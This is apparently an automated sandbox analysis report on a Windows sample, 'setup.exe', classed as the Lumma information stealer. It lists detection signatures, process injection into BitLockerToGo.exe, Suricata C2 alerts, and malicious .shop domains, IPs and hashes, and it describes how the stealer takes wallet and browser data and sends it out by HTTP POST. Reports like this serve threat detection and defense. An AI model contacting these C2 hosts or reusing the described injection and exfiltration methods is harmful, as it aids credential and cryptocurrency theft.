Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:	setup.exe
Analysis ID:	1500379
MD5:	f7ad8585ed9a9b46b3a98a64a7780dc6
SHA1:	0974f543632bbb15787590bba20a2259a02f6a4f
SHA256:	44599cd8d329c27e18e5600cf2ce0dc1a8ebe8be976337eea0070be0995fa40c
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

setup.exe (PID: 5328 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: F7AD8585ED9A9B46B3A98A64A7780DC6)

BitLockerToGo.exe (PID: 1216 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

WerFault.exe (PID: 3436 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1420 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2149222057.0000000003968000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000

Suricata Signatures

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-08-28T11:12:09.704804+0200
SID:	2055293
Severity:	1
Source Port:	50915
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-08-28T11:12:08.764763+0200
SID:	2055301
Severity:	1
Source Port:	49359
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.186.145

Timestamp:	2024-08-28T11:12:10.976634+0200
SID:	2055294
Severity:	1
Source Port:	49710
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.5 - Destination IP: 172.67.186.145

Timestamp:	2024-08-28T11:12:11.465254+0200
SID:	2049812
Severity:	1
Source Port:	49710
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 172.67.186.145

Timestamp:	2024-08-28T11:12:11.465254+0200
SID:	2054653
Severity:	1
Source Port:	49710
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-28T11:12:08.757349+0200
SID:	2049836
Severity:	1
Source Port:	49704
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-28T11:12:08.757349+0200
SID:	2054653
Severity:	1
Source Port:	49704
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 104.21.42.119

Timestamp:	2024-08-28T11:12:09.699817+0200
SID:	2049836
Severity:	1
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 104.21.42.119

Timestamp:	2024-08-28T11:12:09.699817+0200
SID:	2054653
Severity:	1
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 172.67.186.145

Timestamp:	2024-08-28T11:12:10.362401+0200
SID:	2055294
Severity:	1
Source Port:	49707
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Observed Lumma Stealer Related Domain (interactiedovspm .shop in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 104.21.42.119

Timestamp:	2024-08-28T11:12:09.271414+0200
SID:	2055300
Severity:	1
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-08-28T11:12:08.788874+0200
SID:	2055299
Severity:	1
Source Port:	61958
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 172.67.186.145

Timestamp:	2024-08-28T11:12:10.509496+0200
SID:	2049836
Severity:	1
Source Port:	49707
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 172.67.186.145

Timestamp:	2024-08-28T11:12:10.509496+0200
SID:	2054653
Severity:	1
Source Port:	49707
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: largerryskwhq.shop

Source: setup.exe	String found in binary or memory: https://auth.docker.com/
Source: BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://charecteristicdxp.shop/
Source: BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://charecteristicdxp.shop/.
Source: BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://charecteristicdxp.shop/L
Source: BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://charecteristicdxp.shop/api
Source: setup.exe	String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://interactiedovspm.shop/
Source: BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2184777123.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://largerryskwhq.shop/
Source: BitLockerToGo.exe, 00000002.00000002.2184777123.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://largerryskwhq.shop/api
Source: BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://largerryskwhq.shop/api3
Source: setup.exe	String found in binary or memory: https://management.azure.commismatching
Source: BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potentioallykeos.shop/
Source: BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potentioallykeos.shop/api
Source: BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potentioallykeos.shop/ql
Source: setup.exe	String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictmlkem768:
Source: BitLockerToGo.exe, 00000002.00000002.2184777123.0000000002E7E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2172380819.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000002.00000003.2172380819.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.119:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.186.145:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.186.145:443 -> 192.168.2.5:49710 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0042A2A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042A2A0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0042A2A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042A2A0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2149222057.0000000003968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040C4A6	2_2_0040C4A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040AE60	2_2_0040AE60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00405840	2_2_00405840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00433040	2_2_00433040
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00407020	2_2_00407020
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040102B	2_2_0040102B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00425833	2_2_00425833
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041E0E3	2_2_0041E0E3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00407964	2_2_00407964
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00412115	2_2_00412115
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004199C0	2_2_004199C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004139D1	2_2_004139D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004241B0	2_2_004241B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00435A60	2_2_00435A60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041922D	2_2_0041922D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042F2E0	2_2_0042F2E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040CA90	2_2_0040CA90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00437290	2_2_00437290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004241B0	2_2_004241B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041CB50	2_2_0041CB50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00435B50	2_2_00435B50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040D370	2_2_0040D370
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00406300	2_2_00406300
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00410311	2_2_00410311
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004143E2	2_2_004143E2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00408BF0	2_2_00408BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040BB80	2_2_0040BB80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004043B0	2_2_004043B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00435C30	2_2_00435C30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00411501	2_2_00411501
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041A502	2_2_0041A502
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004125CD	2_2_004125CD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004125CD	2_2_004125CD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00437580	2_2_00437580
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004075B0	2_2_004075B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00404E50	2_2_00404E50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041BEE0	2_2_0041BEE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00434E94	2_2_00434E94
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041DEBD	2_2_0041DEBD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00435F40	2_2_00435F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041C720	2_2_0041C720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042E720	2_2_0042E720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00435730	2_2_00435730
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042473C	2_2_0042473C

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 004175B0 appears 119 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 00409610 appears 50 times

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1420

Source: setup.exe, 00000000.00000002.2149222057.000000000392E000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs setup.exe

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2149222057.0000000003968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.evad.winEXE@4/0@4/3

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00418690 CoCreateInstance,

2_2_00418690

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\9fe17e19-e1ed-445e-8544-ff383830658e

Jump to behavior

Source: setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: setup.exe	ReversingLabs: Detection: 70%
Source: setup.exe	Virustotal: Detection: 60%

Source: setup.exe	String found in binary or memory: net/addrselect.go
Source: setup.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\user\Desktop\setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1420
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: setup.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: setup.exe

Static file information: File size 11890176 > 1048576

Source: setup.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4a6000
Source: setup.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x5eee00

Source: setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: setup.exe, 00000000.00000002.2149222057.000000000392E000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: setup.exe, 00000000.00000002.2149222057.000000000392E000.00000004.00001000.00020000.00000000.sdmp

Source: setup.exe

Static PE information: section name: .symtab

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00409CD0 push ebp; retf		2_2_0040A017
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043BA3C push edx; retf 0040h		2_2_0043BA3D

Source: C:\Users\user\Desktop\setup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5768

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: BitLockerToGo.exe, 00000002.00000002.2184777123.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(J
Source: BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2184777123.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2184777123.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4"
Source: setup.exe, 00000000.00000002.2144815394.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00434480 LdrInitializeThunk,

2_2_00434480

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\setup.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\setup.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: setup.exe, 00000000.00000002.2147235754.00000000034F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: weiggheticulop.shop
Source: setup.exe, 00000000.00000002.2147235754.00000000034F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: consciousourwi.shop
